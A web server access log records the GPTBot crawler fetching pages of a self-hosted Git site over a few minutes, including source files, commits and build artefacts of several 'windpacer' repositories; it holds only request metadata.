git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 15881] [Gzip 10.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:15:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:15:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2findex.html" [Client 74.7.227.38] [Length 35178] [Gzip 7.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:15:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" +[17/Feb/2026:15:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" +[17/Feb/2026:15:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13128] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" +[17/Feb/2026:15:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" +[17/Feb/2026:15:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13160] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" +[17/Feb/2026:15:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" +[17/Feb/2026:15:26:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/index.css" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:15:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/find/branch/main" [Client 74.7.227.38] [Length 7470] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:15:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:15:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" +[17/Feb/2026:15:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12464] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12467] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" +[17/Feb/2026:15:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 20852] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 20834] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 20856] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 20858] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 20841] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:15:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents" [Client 74.7.227.38] [Length 60420] [Gzip 8.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:15:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/branch/main" [Client 74.7.227.38] [Length 7467] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:15:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:15:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" +[17/Feb/2026:15:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14252] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:15:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12769] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx" +[17/Feb/2026:15:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibmodbus-5.dll" [Client 74.7.227.38] [Length 23781] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:15:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher" [Client 74.7.227.38] [Length 36307] [Gzip 6.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:15:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final.py" [Client 74.7.227.38] [Length 42409] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:15:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fdatabase.sqlite" [Client 74.7.227.38] [Length 20963] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" +[17/Feb/2026:15:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fdatabase.sqlite" [Client 74.7.227.38] [Length 18357] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" +[17/Feb/2026:15:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +[17/Feb/2026:15:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json?display=source" [Client 74.7.227.38] [Length 11688] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" +[17/Feb/2026:15:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=Roff&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:15:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/branches" +[17/Feb/2026:15:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main" [Client 74.7.227.38] [Length 14564] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/branches" +[17/Feb/2026:15:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 20851] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:15:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:15:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7807] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" +[17/Feb/2026:15:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" +[17/Feb/2026:15:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11267] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:15:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" +[17/Feb/2026:15:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" +[17/Feb/2026:15:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" +[17/Feb/2026:15:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13629] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 